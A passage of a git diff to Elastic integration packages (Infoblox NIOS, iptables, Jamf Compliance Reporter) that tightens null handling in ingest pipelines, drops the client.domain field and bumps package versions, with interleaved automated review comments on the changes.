 for (Map.Entry m : ctx.audit.entrySet()) {
diff --git a/packages/infoblox_nios/data_stream/log/elasticsearch/ingest_pipeline/pipeline_dns.yml b/packages/infoblox_nios/data_stream/log/elasticsearch/ingest_pipeline/pipeline_dns.yml
index f7bd6c6c86f..d24aeafb017 100644
--- a/packages/infoblox_nios/data_stream/log/elasticsearch/ingest_pipeline/pipeline_dns.yml
+++ b/packages/infoblox_nios/data_stream/log/elasticsearch/ingest_pipeline/pipeline_dns.yml
@@ -8,11 +8,11 @@ processors:
 - "^transfer of '%{DATA:dns.question.name}/%{DATA:dns.question.class}' from %{IP:client.ip}#%{NUMBER:client.port:long}:? %{GREEDYDATA:infoblox_nios.log.dns.message}$"
 - "^validating %{DATA:dns.question.name}/%{WORD:dns.question.type}: %{GREEDYDATA:infoblox_nios.log.dns.message}$"
 - "^(%{NOTSPACE:infoblox_nios.log.dns.category}:)?\\s*%{CLIENT} updating zone '%{DATA:dns.question.name}/%{DATA:dns.question.class}': %{GREEDYDATA:infoblox_nios.log.dns.message}$"
- - "^(%{NOTSPACE:infoblox_nios.log.dns.category}:)?\\s*%{CLIENT} \\(%{DATA:client.domain}\\): %{VIEW}?query failed %{GREEDYDATA:infoblox_nios.log.dns.message}$"
+ - "^(%{NOTSPACE:infoblox_nios.log.dns.category}:)?\\s*%{CLIENT} \\(%{DATA}\\): %{VIEW}?query failed %{GREEDYDATA:infoblox_nios.log.dns.message}$"
 - "^(%{NOTSPACE:infoblox_nios.log.dns.category}:)?\\s*%{CLIENT} \\(%{DATA:infoblox_nios.log.dns.before_query}\\): rewriting query name %{DATA} to '%{DATA:infoblox_nios.log.dns.after_query}', type %{DATA:dns.question.type}$"
- - "^(%{NOTSPACE:infoblox_nios.log.dns.category}:)?\\s*%{CLIENT} \\(%{DATA:client.domain}\\): %{VIEW}?query: %{DATA:dns.question.name} %{DATA:dns.question.class} %{WORD:dns.question.type} %{DATA:infoblox_nios.log.dns.header_flags} \\(%{IP:server.ip}\\)$"
+ - "^(%{NOTSPACE:infoblox_nios.log.dns.category}:)?\\s*%{CLIENT} \\(%{DATA}\\): %{VIEW}?query: %{DATA:dns.question.name} %{DATA:dns.question.class} %{WORD:dns.question.type} %{DATA:infoblox_nios.log.dns.header_flags} \\(%{IP:server.ip}\\)$"
 - "^(%{NOTSPACE:infoblox_nios.log.dns.category}:)?\\s*%{CLIENT} %{DATA:network.transport}: %{VIEW}?query: %{DATA:dns.question.name} %{DATA:dns.question.class} %{WORD:dns.question.type} response: %{DATA:dns.response_code} %{DATA:infoblox_nios.log.dns.header_flags}$"
- - "^(%{NOTSPACE:infoblox_nios.log.dns.category}:)?\\s*%{CLIENT} \\(%{DATA:client.domain}\\): transfer of '%{DATA:dns.question.name}/%{DATA:dns.question.class}': %{GREEDYDATA:infoblox_nios.log.dns.message}$"
+ - "^(%{NOTSPACE:infoblox_nios.log.dns.category}:)?\\s*%{CLIENT} \\(%{DATA}\\): transfer of '%{DATA:dns.question.name}/%{DATA:dns.question.class}': %{GREEDYDATA:infoblox_nios.log.dns.message}$"
 - "^(%{NOTSPACE:infoblox_nios.log.dns.category}:)?\\s*CEF:0\\|Infoblox\\|NIOS\\|%{GREEDYDATA:infoblox_nios.log.dns.version}\\|RPZ-%{DATA:dns.answers.type}\\|%{DATA:infoblox_nios.log.dns.answers_policy}\\|\\d+\\|app=DNS dst=%{IP:server.ip} src=%{IP:client.ip} spt=%{NUMBER:client.port:long} view=%{DATA:infoblox_nios.log.dns.view_name} qtype=%{WORD:dns.question.type} msg=%{GREEDYDATA:infoblox_nios.log.dns.message}$"
 - "^(%{NOTSPACE:infoblox_nios.log.dns.category}:)?\\s*%{GREEDYDATA:_tmp.timestamp} %{CLIENT} %{DATA:network.transport}: %{VIEW}?query: %{DATA:dns.question.name} %{DATA:dns.question.class} %{WORD:dns.question.type} response: %{DATA:dns.response_code} %{DATA:infoblox_nios.log.dns.header_flags} %{GREEDYDATA:repeat_message}$"
 - "^(%{NOTSPACE:infoblox_nios.log.dns.category}:)?\\s*%{GREEDYDATA:_tmp.timestamp} %{CLIENT} %{DATA:network.transport}: %{VIEW}?query: %{DATA:dns.question.name} %{DATA:dns.question.class} %{WORD:dns.question.type} response: %{DATA:dns.response_code} %{DATA:infoblox_nios.log.dns.header_flags}$"
@@ -92,7 +92,7 @@ processors:
 map.put('type', new ArrayList());
 map.put('data', new ArrayList());
- for (def i = 0; i < arr?.length; i++) {
+ for (def i = 0; i < arr.length; i++) {
 def response = splitUnquoted(arr[i], " ");
 if (response.size() >= 4) {
 map['name'].add(response[0]);
@@ -124,7 +124,7 @@ processors:
 if: ctx.dns?.answers?.data instanceof List
 source: |
 def hash = new ArrayList();
- for(data in ctx.dns?.answers?.data){
+ for(data in ctx.dns.answers.data){
 def n = data.length();
 if(data.charAt(n-1).toString() == '.'){
 def data_substring = data.substring(0,n-1) + data.substring(n);
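Review bot: The three rewritten patterns on the `+` lines of the `@@ -8,11` hunk replace `%{DATA:client.domain}` with an unnamed `%{DATA}`, so the parenthesised token after `%{CLIENT}` is no longer captured anywhere, and with the `related.hosts` append and the `client.domain` ECS entry removed later in this diff the field disappears from the data stream entirely. Any saved search or detection rule keyed on `client.domain`, or on `related.hosts` values that came from it, will silently stop matching, so this deserves an explicit breaking-change entry in the package changelog (not visible in this chunk) rather than only the minor version bump in manifest.yml. If, as the neighbouring `query:` pattern suggests, the token was mis-mapped and is not a client host name, a one-line comment above the first rewritten pattern such as `# the parenthesised value after the client is not client.domain; deliberately left uncaptured` would stop a later maintainer from reintroducing the mapping.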
@@ -141,7 +141,7 @@ processors:
 if: ctx.dns?.answers?.name instanceof List
 source: |
 def hash = new ArrayList();
- for(name in ctx.dns?.answers?.name){
+ for(name in ctx.dns.answers.name){
 def n = name.length();
 if(name.charAt(n-1).toString() == '.'){
 def name_substring = name.substring(0,n-1) + name.substring(n);
@@ -198,12 +198,6 @@ processors:
 if: ctx.server?.ip != null
 allow_duplicates: false
 ignore_failure: true
- - append:
- field: related.hosts
- value: '{{{client.domain}}}'
- if: ctx.client?.domain != null
- allow_duplicates: false
- ignore_failure: true
 - foreach:
 field: dns.answers.name
 if: ctx.dns?.answers?.name != null
@@ -251,7 +245,7 @@ processors:
 ctx.put('dns', hm);
 }
 ctx.dns.put('header_flags', hf);
- - registered_domain:
+ - registered_domain:
 field: "dns.question.name"
 target_field: "dns.question"
 if: ctx.dns?.question != null
diff --git a/packages/infoblox_nios/data_stream/log/fields/ecs.yml b/packages/infoblox_nios/data_stream/log/fields/ecs.yml
index a791189c471..58ddc8313d0 100644
--- a/packages/infoblox_nios/data_stream/log/fields/ecs.yml
+++ b/packages/infoblox_nios/data_stream/log/fields/ecs.yml
@@ -1,5 +1,3 @@
-- external: ecs
- name: client.domain
 - external: ecs
 name: client.geo.city_name
 - external: ecs
diff --git a/packages/infoblox_nios/data_stream/log/sample_event.json b/packages/infoblox_nios/data_stream/log/sample_event.json
index aff57adf68e..4af8cbf9265 100644
--- a/packages/infoblox_nios/data_stream/log/sample_event.json
+++ b/packages/infoblox_nios/data_stream/log/sample_event.json
@@ -76,4 +76,4 @@
 "user": {
 "name": "user"
 }
-}
+}
\ No newline at end of file
diff --git a/packages/infoblox_nios/docs/README.md b/packages/infoblox_nios/docs/README.md
index eb79adcffb6..b509f8846b7 100644
--- a/packages/infoblox_nios/docs/README.md
+++ b/packages/infoblox_nios/docs/README.md
@@ -231,7 +231,6 @@ An example event for `log` looks as following:
 "name": "user"
 }
 }
-
 ```
 **Exported fields**
@@ -242,7 +241,6 @@ An example event for `log` looks as following:
 | client.as.number | Unique number allocated to the autonomous system. The autonomous system number (ASN) uniquely identifies each network on the Internet. | long |
 | client.as.organization.name | Organization name. | keyword |
 | client.as.organization.name.text | Multi-field of `client.as.organization.name`. | match_only_text |
-| client.domain | The domain name of the client system. This value may be a host name, a fully qualified domain name, or another host naming format. The value may derive from the original event or be added from enrichment. | keyword |
 | client.geo.city_name | City name. | keyword |
 | client.geo.continent_name | Name of the continent. | keyword |
 | client.geo.country_iso_code | Country ISO code. | keyword |
diff --git a/packages/infoblox_nios/manifest.yml b/packages/infoblox_nios/manifest.yml
index ebff4bb5ff7..a9513b78fe6 100644
--- a/packages/infoblox_nios/manifest.yml
+++ b/packages/infoblox_nios/manifest.yml
@@ -1,7 +1,7 @@
-format_version: "3.0.0"
+format_version: "3.0.3"
 name: infoblox_nios
 title: Infoblox NIOS
-version: "1.20.1"
+version: "1.21.0"
 description: Collect logs from Infoblox NIOS with Elastic Agent.
 type: integration
 categories:
diff --git a/packages/iptables/changelog.yml b/packages/iptables/changelog.yml
index 5e95bd88958..ed25e1d4cae 100644
--- a/packages/iptables/changelog.yml
+++ b/packages/iptables/changelog.yml
@@ -1,4 +1,9 @@
 # newer versions go on top
+- version: "1.16.0"
+ changes:
+ - description: Update package spec to 3.0.3.
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/9235
 - version: "1.15.2"
 changes:
 - description: Changed owners
diff --git a/packages/iptables/manifest.yml b/packages/iptables/manifest.yml
index 0c8ea4cab27..3e95ded6fbc 100644
--- a/packages/iptables/manifest.yml
+++ b/packages/iptables/manifest.yml
@@ -1,6 +1,6 @@
 name: iptables
 title: Iptables
-version: "1.15.2"
+version: "1.16.0"
 description: Collect logs from Iptables with Elastic Agent.
 type: integration
 icons:
@@ -8,7 +8,7 @@ icons:
 title: linux
 size: 299x354
 type: image/svg+xml
-format_version: "3.0.0"
+format_version: "3.0.3"
 categories:
 - network
 - security
diff --git a/packages/jamf_compliance_reporter/_dev/deploy/docker/docker-compose.yml b/packages/jamf_compliance_reporter/_dev/deploy/docker/docker-compose.yml
index 3f0a3d88cd2..bf68a901783 100644
--- a/packages/jamf_compliance_reporter/_dev/deploy/docker/docker-compose.yml
+++ b/packages/jamf_compliance_reporter/_dev/deploy/docker/docker-compose.yml
@@ -1,7 +1,7 @@
 version: "2.3"
 services:
 jamf-compliance-reporter-log-http-endpoint:
- image: docker.elastic.co/observability/stream:v0.8.0
+ image: docker.elastic.co/observability/stream:v0.15.0
 volumes:
 - ./sample_logs:/sample_logs:ro
 environment:
@@ -9,8 +9,7 @@ services:
 - STREAM_ADDR=http://elastic-agent:9551/
 command: log --start-signal=SIGHUP --delay=5s /sample_logs/log.log
 jamf-compliance-reporter-log-tcp:
- image: docker.elastic.co/observability/stream:v0.8.0
+ image: docker.elastic.co/observability/stream:v0.15.0
 volumes:
 - ./sample_logs:/sample_logs:ro
- entrypoint: /bin/bash
- command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9552 -p=tcp /sample_logs/log.log"
+ command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9552 -p=tcp /sample_logs/log.log
diff --git a/packages/jamf_compliance_reporter/changelog.yml b/packages/jamf_compliance_reporter/changelog.yml
index 623a5f59fa8..d79e16252a3 100644
--- a/packages/jamf_compliance_reporter/changelog.yml
+++ b/packages/jamf_compliance_reporter/changelog.yml
@@ -1,4 +1,14 @@
 # newer versions go on top
+- version: "1.12.0"
+ changes:
+ - description: Update manifest format version to v3.0.3.
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/9402
+- version: "1.11.2"
+ changes:
+ - description: Clean up null handling, other checks and scripting
+ type: bugfix
+ link: https://github.com/elastic/integrations/pull/9179
 - version: "1.11.1"
 changes:
 - description: Changed owners
diff --git a/packages/jamf_compliance_reporter/data_stream/log/_dev/test/system/test-http-endpoint-config.yml b/packages/jamf_compliance_reporter/data_stream/log/_dev/test/system/test-http-endpoint-config.yml
index d47b336671b..e4e6ec5845f 100644
--- a/packages/jamf_compliance_reporter/data_stream/log/_dev/test/system/test-http-endpoint-config.yml
+++ b/packages/jamf_compliance_reporter/data_stream/log/_dev/test/system/test-http-endpoint-config.yml
@@ -6,3 +6,5 @@ data_stream:
 vars:
 listen_address: 0.0.0.0
 listen_port: 9551
+assert:
+ hit_count: 53
diff --git a/packages/jamf_compliance_reporter/data_stream/log/_dev/test/system/test-tcp-config.yml b/packages/jamf_compliance_reporter/data_stream/log/_dev/test/system/test-tcp-config.yml
index 2c71dba8300..80660b1d971 100644
--- a/packages/jamf_compliance_reporter/data_stream/log/_dev/test/system/test-tcp-config.yml
+++ b/packages/jamf_compliance_reporter/data_stream/log/_dev/test/system/test-tcp-config.yml
@@ -6,3 +6,5 @@ data_stream:
 vars:
 listen_address: 0.0.0.0
 listen_port: 9552
+assert:
+ hit_count: 53
diff --git a/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/default.yml b/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/default.yml
index a0b88196dac..ea31c9199c3 100644
--- a/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/default.yml
+++ b/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/default.yml
@@ -18,7 +18,7 @@ processors:
 if: ctx.json?.header?.event_name == 'APP_METRICS'
 - pipeline:
 name: '{{ IngestPipeline "pipeline_audit" }}'
- if: ctx.json?.header?.event_name != null && ctx.json?.header?.event_name.startsWith('AUE_')
+ if: ctx.json?.header?.event_name?.startsWith('AUE_') == true
 - pipeline:
 name: '{{ IngestPipeline "pipeline_event" }}'
 if: "['AUDIO_VIDEO_DEVICE_EVENT','AUDIT_CLASS_VERIFICATION_EVENT','COMPLIANCE_REPORTER_TAMPER_EVENT','FILE_EVENT','GATEKEEPER_INFO_EVENT','GATEKEEPER_MANUAL_OVERRIDES','GATEKEEPER_QUARANTINE_LOG','HARDWARE_EVENT','LICENSE_INFO_EVENT','PREFERENCE_LIST_EVENT','PRINT_EVENT_INFORMATION','PROHIBITED_APP_BLOCKED','SIGNAL_EVENT','UNIFIED_LOG_EVENT','XPROTECT_DEFINITIONS_VERSION_INFO','XPROTECT_EVENT_LOG'].contains(ctx.json?.header?.event_name)"
diff --git a/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_app_metrics.yml b/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_app_metrics.yml
index 4170a0d979f..59a240b8272 100644
--- a/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_app_metrics.yml
+++ b/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_app_metrics.yml
@@ -136,7 +136,7 @@ processors:
 if: ctx.json?.app_metric_info?.cpu_percentage != null
 source: |
 ctx.host.cpu = new HashMap();
- ctx.host.cpu.usage = Math.round(ctx.json?.app_metric_info?.cpu_percentage *10) / 1000.0;
+ ctx.host.cpu.usage = Math.round(ctx.json.app_metric_info.cpu_percentage * 10) / 1000.0;
 on_failure:
 - set:
 field: event.kind
diff --git a/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_audit.yml b/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_audit.yml
index bac5015441c..ad2ef387bfe 100644
--- a/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_audit.yml
+++ b/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_audit.yml
@@ -34,12 +34,15 @@ processors:
 ignore_missing: true
 - script:
 lang: painless
- if: ctx.json?.header?.time_seconds_epoch != 0
+ if: ctx.json?.header?.time_seconds_epoch != null && ctx.json.header.time_seconds_epoch != 0
 source: |
- ctx.json.time_milliseconds = (long)ctx.json?.header?.time_seconds_epoch * 1000 + (long)ctx.json?.header?.time_milliseconds_offset;
+ ctx.json.time_milliseconds = (long)ctx.json.header.time_seconds_epoch * 1000;
+ if (ctx.json?.header?.time_milliseconds_offset != null && ctx.json.header.time_milliseconds_offset != 0) {
+ ctx.json.time_milliseconds = ctx.json.time_milliseconds + (long)ctx.json.header.time_milliseconds_offset;
+ }
 - date:
 field: json.time_milliseconds
- if: ctx.json?.time_milliseconds != 0
+ if: ctx.json?.time_milliseconds != null && ctx.json.time_milliseconds != 0
 formats:
 - UNIX_MS
 on_failure:
@@ -281,82 +284,82 @@ processors:
 value: authentication
 - pipeline:
 name: '{{ IngestPipeline "pipeline_aue_accept" }}'
- if: ctx.event?.action == 'aue_accept'
+ if: ctx.event.action == 'aue_accept'
 - pipeline:
 name: '{{ IngestPipeline "pipeline_aue_auth" }}'
- if: '["aue_auth_user", "aue_ssauthorize", "aue_ssauthmech"].contains(ctx.event?.action)'
+ if: '["aue_auth_user", "aue_ssauthorize", "aue_ssauthmech"].contains(ctx.event.action)'
 - pipeline:
 name: '{{ IngestPipeline "pipeline_aue_bind_and_aue_connect" }}'
- if: '["aue_bind", "aue_connect"].contains(ctx.event?.action)'
+ if: '["aue_bind", "aue_connect"].contains(ctx.event.action)'
 - pipeline:
 name: '{{ IngestPipeline "pipeline_aue_chdir" }}'
- if: ctx.event?.action == 'aue_chdir'
+ if: ctx.event.action == 'aue_chdir'
 - pipeline:
 name: '{{ IngestPipeline "pipeline_aue_chroot" }}'
- if: ctx.event?.action == 'aue_chroot'
+ if: ctx.event.action == 'aue_chroot'
 - pipeline:
 name: '{{ IngestPipeline "pipeline_aue_execve" }}'
- if: ctx.event?.action == 'aue_execve'
+ if: ctx.event.action == 'aue_execve'
 - pipeline:
 name: '{{ IngestPipeline "pipeline_aue_exit" }}'
- if: ctx.event?.action == 'aue_exit'
+ if: ctx.event.action == 'aue_exit'
 - pipeline:
 name: '{{ IngestPipeline "pipeline_aue_kill" }}'
- if: ctx.event?.action == 'aue_kill'
+ if: ctx.event.action == 'aue_kill'
 - pipeline:
 name: '{{ IngestPipeline "pipeline_aue_mount" }}'
- if: ctx.event?.action == 'aue_mount'
+ if: ctx.event.action == 'aue_mount'
 - pipeline:
 name: '{{ IngestPipeline "pipeline_aue_posix_spawn" }}'
- if: ctx.event?.action == 'aue_posix_spawn'
+ if: ctx.event.action == 'aue_posix_spawn'
 - pipeline:
 name: '{{ IngestPipeline "pipeline_aue_remove_from_group_and_aue_mac_set_proc" }}'
- if: '["aue_remove_from_group", "aue_mac_set_proc"].contains(ctx.event?.action)'
+ if: '["aue_remove_from_group", "aue_mac_set_proc"].contains(ctx.event.action)'
 - pipeline:
 name: '{{ IngestPipeline "pipeline_aue_session" }}'
- if: '["aue_session_end", "aue_session_update", "aue_session_close", "aue_session_start"].contains(ctx.event?.action)'
+ if: '["aue_session_end", "aue_session_update", "aue_session_close", "aue_session_start"].contains(ctx.event.action)'
 - pipeline:
 name: '{{ IngestPipeline "pipeline_aue_arguments" }}'
- if: '["aue_setsockopt", "aue_shutdown"].contains(ctx.event?.action)'
+ if: '["aue_setsockopt", "aue_shutdown"].contains(ctx.event.action)'
 - pipeline:
 name: '{{ IngestPipeline "pipeline_aue_ssauthint" }}'
- if: ctx.event?.action == 'aue_ssauthint'
+ if: ctx.event.action == 'aue_ssauthint'
 - pipeline:
 name: '{{ IngestPipeline "pipeline_aue_tasknameforpid" }}'
- if: ctx.event?.action == 'aue_tasknameforpid'
+ if: ctx.event.action == 'aue_tasknameforpid'
 - pipeline:
 name: '{{ IngestPipeline "pipeline_aue_unmount" }}'
- if: ctx.event?.action == 'aue_unmount'
+ if: ctx.event.action == 'aue_unmount'
 - pipeline:
 name: '{{ IngestPipeline "pipeline_aue_fork" }}'
- if: ctx.event?.action == 'aue_fork'
+ if: ctx.event.action == 'aue_fork'
 - pipeline:
 name: '{{ IngestPipeline "pipeline_identity_object" }}'
- if: '["aue_getauid", "aue_lw_login", "aue_settimeofday"].contains(ctx.event?.action)'
+ if: '["aue_getauid", "aue_lw_login", "aue_settimeofday"].contains(ctx.event.action)'
 - pipeline:
 name: '{{ IngestPipeline "pipeline_aue_listen" }}'
- if: ctx.event?.action == 'aue_listen'
+ if: ctx.event.action == 'aue_listen'
 - pipeline:
 name: '{{ IngestPipeline "pipeline_aue_logout" }}'
- if: ctx.event?.action == 'aue_logout'
+ if: ctx.event.action == 'aue_logout'
 - pipeline:
 name: '{{ IngestPipeline "pipeline_aue_pidfortask" }}'
- if: ctx.event?.action == 'aue_pidfortask'
+ if: ctx.event.action == 'aue_pidfortask'
 - pipeline:
 name: '{{ IngestPipeline "pipeline_aue_ptrace" }}'
- if: ctx.event?.action == 'aue_ptrace'
+ if: ctx.event.action == 'aue_ptrace'
 - pipeline:
 name: '{{ IngestPipeline "pipeline_aue_setpriority" }}'
- if: ctx.event?.action == 'aue_setpriority'
+ if: ctx.event.action == 'aue_setpriority'
 - pipeline:
 name: '{{ IngestPipeline "pipeline_aue_socketpair" }}'
- if: ctx.event?.action == 'aue_socketpair'
+ if: ctx.event.action == 'aue_socketpair'
 - pipeline:
 name: '{{ IngestPipeline "pipeline_aue_taskforpid" }}'
- if: ctx.event?.action == 'aue_taskforpid'
+ if: ctx.event.action == 'aue_taskforpid'
 - pipeline:
 name: '{{ IngestPipeline "pipeline_aue_wait4" }}'
- if: ctx.event?.action == 'aue_wait4'
+ if: ctx.event.action == 'aue_wait4'
 on_failure:
 - set:
 field: event.kind
diff --git a/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_aue_chdir.yml b/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_aue_chdir.yml
index dc3230f0995..331a9c99661 100644
--- a/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_aue_chdir.yml
+++ b/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_aue_chdir.yml
@@ -65,8 +65,9 @@ processors:
 - script:
 description: Convert Decimal into Octal.
 lang: painless
+ if: ctx.json?.file_access_mode != null
 source: |
- int temp = (int)ctx.json?.file_access_mode;
+ int temp = (int)ctx.json.file_access_mode;
 ctx.jamf_compliance_reporter.log.attributes.file.access_mode = Integer.toOctalString(temp);
 on_failure:
 - set:
diff --git a/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_aue_chroot.yml b/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_aue_chroot.yml
index fe3f1f5affa..baab69174ee 100644
--- a/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_aue_chroot.yml
+++ b/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_aue_chroot.yml
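Review bot: Every `if:` on the `+` lines of the `@@ -281,82` hunk in pipeline_audit.yml now reads `ctx.event.action` without the null-safe operator, which relies on `ctx.event` already being a map at that point, yet the matching hunk in pipeline_event.yml documents the same precondition with `# NOTE: ctx.event is initialized by an earlier processor` and this one does not. Add the same comment before the first `- pipeline:` entry here so the assumption is stated where it is relied on. The context line `value: authentication` suggests an `event.*` set precedes this block, but the processor that creates `ctx.event` is outside the hunk, so please confirm it is unconditional; otherwise a document that skips it turns the former silent non-match into a null-pointer failure routed to `on_failure`.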
@@ -67,8 +67,9 @@ processors:
 - script:
 description: Convert Decimal into Octal.
 lang: painless
+ if: ctx.json?.file_access_mode != null
 source: |
- int temp = (int)ctx.json?.file_access_mode;
+ int temp = (int)ctx.json.file_access_mode;
 ctx.jamf_compliance_reporter.log.attributes.file.access_mode = Integer.toOctalString(temp);
 on_failure:
 - set:
diff --git a/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_aue_execve.yml b/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_aue_execve.yml
index 0bfcf44c5a6..997c3bf5bd7 100644
--- a/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_aue_execve.yml
+++ b/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_aue_execve.yml
@@ -134,14 +134,17 @@ processors:
 source: |
 def args_list = new ArrayList();
 ctx.process.args = args_list;
- for (Map.Entry m : ctx.json?.args.entrySet()) {
- ctx.process?.args.add(m.getValue());
+ if (ctx.json?.args != null) {
+ for (Map.Entry m : ctx.json.args.entrySet()) {
+ ctx.process.args.add(m.getValue());
+ }
 }
 - script:
 description: Convert Decimal into Octal.
 lang: painless
+ if: ctx.json?.file_access_mode != null
 source: |
- int temp = (int)ctx.json?.file_access_mode;
+ int temp = (int)ctx.json.file_access_mode;
 ctx.jamf_compliance_reporter.log.attributes.file.access_mode = Integer.toOctalString(temp);
 on_failure:
 - set:
diff --git a/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_aue_mount.yml b/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_aue_mount.yml
index c1cf9fe39fb..15817ff08dd 100644
--- a/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_aue_mount.yml
+++ b/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_aue_mount.yml
@@ -77,6 +77,7 @@ processors:
 - script:
 description: Convert Decimal into Octal.
 lang: painless
+ if: ctx.json?.file_access_mode != null
 source: |
 int temp = (int)ctx.json?.file_access_mode;
 ctx.jamf_compliance_reporter.log.attributes.file.access_mode = Integer.toOctalString(temp);
diff --git a/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_aue_posix_spawn.yml b/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_aue_posix_spawn.yml
index 939d6e340bd..0817db223fa 100644
--- a/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_aue_posix_spawn.yml
+++ b/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_aue_posix_spawn.yml
@@ -40,8 +40,10 @@ processors:
 source: |
 def args_list = new ArrayList();
 ctx.process.args = args_list;
- for (Map.Entry m : ctx.json?.args.entrySet()) {
- ctx.process?.args.add(m.getValue());
+ if (ctx.json?.args != null) {
+ for (Map.Entry m : ctx.json.args.entrySet()) {
+ ctx.process.args.add(m.getValue());
+ }
 }
 - pipeline:
 name: '{{ IngestPipeline "pipeline_identity_object" }}'
diff --git a/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_aue_unmount.yml b/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_aue_unmount.yml
index f42173c6686..4d55ece2e1d 100644
--- a/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_aue_unmount.yml
+++ b/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_aue_unmount.yml
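Review bot: The `@@ -77,6` hunk in pipeline_aue_mount.yml adds the `+ if: ctx.json?.file_access_mode != null` guard but leaves the script body on the context line as `(int)ctx.json?.file_access_mode`, while the equivalent hunks in pipeline_aue_chdir.yml, pipeline_aue_chroot.yml, pipeline_aue_execve.yml and pipeline_aue_unmount.yml drop the now-redundant `?.` together with the same guard. Change it to `int temp = (int)ctx.json.file_access_mode;` so the five Decimal-to-Octal scripts stay textually identical and a future search-and-replace does not skip this one. Behaviour is the same either way, since the guard already excludes the null case.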
@@ -67,8 +67,9 @@ processors:
 - script:
 description: Convert Decimal into Octal.
 lang: painless
+ if: ctx.json?.file_access_mode != null
 source: |
- int temp = (int)ctx.json?.file_access_mode;
+ int temp = (int)ctx.json.file_access_mode;
 ctx.jamf_compliance_reporter.log.attributes.file.access_mode = Integer.toOctalString(temp);
 on_failure:
 - set:
diff --git a/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_event.yml b/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_event.yml
index 04c5b1e82be..4b67f3ca4f6 100644
--- a/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_event.yml
+++ b/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_event.yml
@@ -78,51 +78,52 @@ processors:
 field: json.host_info.serial_number
 target_field: host.id
 ignore_missing: true
+ # NOTE: ctx.event is initialized by an earlier processor
 - pipeline:
 name: '{{ IngestPipeline "pipeline_audio_video_device_event" }}'
- if: ctx.event?.action == 'audio_video_device_event'
+ if: ctx.event.action == 'audio_video_device_event'
 - pipeline:
 name: '{{ IngestPipeline "pipeline_audit_class_verification_event" }}'
- if: ctx.event?.action == 'audit_class_verification_event'
+ if: ctx.event.action == 'audit_class_verification_event'
 - pipeline:
 name: '{{ IngestPipeline "pipeline_compliance_reporter_tamper_event_and_file_event_info" }}'
- if: '["compliance_reporter_tamper_event", "file_event"].contains(ctx.event?.action)'
+ if: '["compliance_reporter_tamper_event", "file_event"].contains(ctx.event.action)'
 - pipeline:
 name: '{{ IngestPipeline "pipeline_gatekeeper_info_event" }}'
- if: ctx.event?.action == 'gatekeeper_info_event'
+ if: ctx.event.action == 'gatekeeper_info_event'
 - pipeline:
 name: '{{ IngestPipeline "pipeline_gatekeeper_manual_overrides" }}'
- if: ctx.event?.action == 'gatekeeper_manual_overrides'
+ if: ctx.event.action == 'gatekeeper_manual_overrides'
 - pipeline:
 name: '{{ IngestPipeline "pipeline_gatekeeper_quarantine_log" }}'
- if: ctx.event?.action == 'gatekeeper_quarantine_log'
+ if: ctx.event.action == 'gatekeeper_quarantine_log'
 - pipeline:
 name: '{{ IngestPipeline "pipeline_hardware_event" }}'
- if: ctx.event?.action == 'hardware_event'
+ if: ctx.event.action == 'hardware_event'
 - pipeline:
 name: '{{ IngestPipeline "pipeline_license_info_event" }}'
- if: ctx.event?.action == 'license_info_event'
+ if: ctx.event.action == 'license_info_event'
 - pipeline:
 name: '{{ IngestPipeline "pipeline_preference_list_event" }}'
